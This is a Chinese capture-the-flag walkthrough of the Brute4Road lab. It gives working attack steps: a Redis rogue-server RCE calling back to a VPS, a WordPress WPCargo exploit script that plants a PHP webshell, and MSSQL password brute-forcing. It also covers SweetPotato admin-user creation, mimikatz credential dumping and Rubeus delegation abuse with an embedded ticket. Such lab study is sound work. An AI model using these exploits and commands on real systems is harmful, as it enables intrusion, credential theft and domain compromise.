春秋云镜-Brute4Road

Brute4Road

flag01

redis

scan一下

打redis <5.0.5 主从复制

1
2
3
#git clone https://github.com/n0b0dyCN/redis-rogue-server.git

python3 redis-rogue-server.py --rhost XX.XX.XX.XXX --lhost xx.XX.XX.XXX(VPS)

python3 redis-rogue-server.py –rhost XX.XX.XX.XXX –lhost xx.XX.XX.XXX(VPS)

提权

1
2
3
find / -user root -perm -4000 -print 2>/dev/null

base64 "flag01" |base64 --decode

flag02

上传一下fscan frp

ifconfig命令不存在,使用netstat

1
netstat -ano

1
./fscan -h 172.22.2.7/24

wordpress

177.22.2.18有一个

wordpress

1
proxychains wpscan --url http://172.22.2.18

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):

return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.

requests.get(

f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(

f"{destination_url}webshell.php?1=system", data={"2": cmd}

).content.decode('ascii', 'ignore'))

蚁剑cmdlinux连接

看到数据库配置

1
2
wpuser
WpuserEha8Fgj9

连接数据库

flag03

查看密码

保存到1.txt

1
proxychains4 -q hydra -l sa -P 1.txt 172.22.2.16 mssql -f

爆破出密码

连接上mssql

1
2
sa
ElGNkOiC

激活插件,上传小土豆

开了3389端口,远程桌面连接

1
2
3
#添加一个用户到管理组 远程桌面连接
C:/Users/Public/sweetpotato.exe -a "net user aaa 123qwe! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators aaa /add" # 加到管理组

flag04

猕猴桃获取本地密码

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

MSSQLSERVER机器配置了到 DC LDAP 和 CIFS 服务的约束性委派

约束委派攻击

通过Rubeus申请机器账户MSSQLSERVER的TGT,执行后,将得到 Base64 加密后的 TGT 票据

1
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:2b3d07a8dad347489c9eb6f5c6dd2566 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

1.txt

1
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE2plN7kT2CJeBj0qj9SUEk4BH7cpiqKry2e083Ve0GfyMN/VDLsDMuE16/hqZWaWSQMbq+2VB/aMbu6yIDAUZ+FoPy4HsPAWo3geunr1JTkjxPYXzxTWJFFYBEXIOEo3+QwB5d5IxI5wANiQRoQeUDzdJKohCRO8ifN5Cv90EC2XtTG2IwisFn67aTQ/1CEIQGUb4r2kVANeRge/3XrLzEpZHPUVqLhVro0aGQ5ksekf5Cwk3Erg3+PRks4qmyjyyBBlRcLuIZpCNfW4D8/WGEC9LxJbf7Vsgruf8fRSgbM7GWJGIwmQZOvLTquIuBeH43To577cu6khbqy5i6OaFNZoN0xUu7fzq/bPsv1wMR+f1OCyNJuFfXq5DkIPJdxmgu/b5UQWgAo6XiP7wEmWfGcOxqoG9vB5lPA+M56itFxPCbbkK2nkGHXgAmn3PJEeTXv14KvvKOL13Botrq+7zt1u2qTyqq9LvSnW+1QVwPzNoGN6P3FPLlcV/wkV0LNro+/vC1Hy4ImoAIWZnT5W2BPkHtSp/1MFb6Lotlbp1duOa583VhRWCsGJXuTa5XiA4Wxua20F23YPKx/b7RJah/wJVe7sIWNKUxgpUXetT4eChFsU6QpOYm6SpPRX4XTFWcP9P+rL0d+ijLA6hDsdJmq+Wpv6RgQksRo3bQbRAWudxSJmRPHaqaLw37Pc61Lw4c22VMosviTxW27MTvxEop0KvjsgKGZ/6kUSgQJDkY6Krzsxba1b3LJGXiV2uXTy3HzMVAdNc+8q5Wj2w6c9AoQaIY4aWjK+QBPXrpCo+d3IKHVrCy/b9s+1VkM8ONyrLsEe3S4Z+QKXDXhlAdvS1bd8/xgYprGLSXNLE33xsay1rnvWy83/vmLhntHNFVZSmUc6Zq3oLd6/wVRPKUCEGRNOusYFSDXINRe8WwzUy6Fw8R3KYnfGKxUNjCqPsbtOMU6AF4d/GJnlSkU0p9q50GQzFLSMJMCr+aPKcHgX6XwXjUcl6cnUc1Cv/Qk4c1MWbnTiqtj2HXxvOjtAO5yDxOeJ/yLunzfLyvWQQxuPNtPSCVYUND3mkaDZijyubSGe+bH2+yynk+paCJW6ZNU84D6p4qpV7TtqluSg6DNgUHEyIumt6WZf3NTCOg2znpkOAKKRqqUFZVn5I9S1fUQ77Vc9cIIPL7Q09/NtgNzvj4v9AOrVlzkePB25aI7DeKh1XRQttr+bShh4Rb7eOQvGtua3kFifALr37Yo7T+pAtpbUAQ0X2CnMpEPkYCXDQ9wVs/PVIvUPx2BhZM2o1yW96QJdlxWju+jYHPtc2+cAACI6WzKCVgdaeZEfM4vcAbUm0etyqJ45wCbsUKWI6B+cbagGnjBd+q340CWKsF52ceY9KMyuy1iI3mW/bHkhRzx4M2rsvSnskjcICbbxK4DFp3Ij27SJb+OVm59Rw13y1m4MYVjDcN18bUYTrcwwEijgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAYd1aMtxkLpzT/N+BwTwfJoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDMxMzEzNDYxNFqmERgPMjAyNTAzMTMyMzQ2MTRapxEYDzIwMjUwMzIwMTM0NjE0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

读域管文件

1
type \\DC.xiaorang.lab\C$\users\administrator\flag\flag04.txt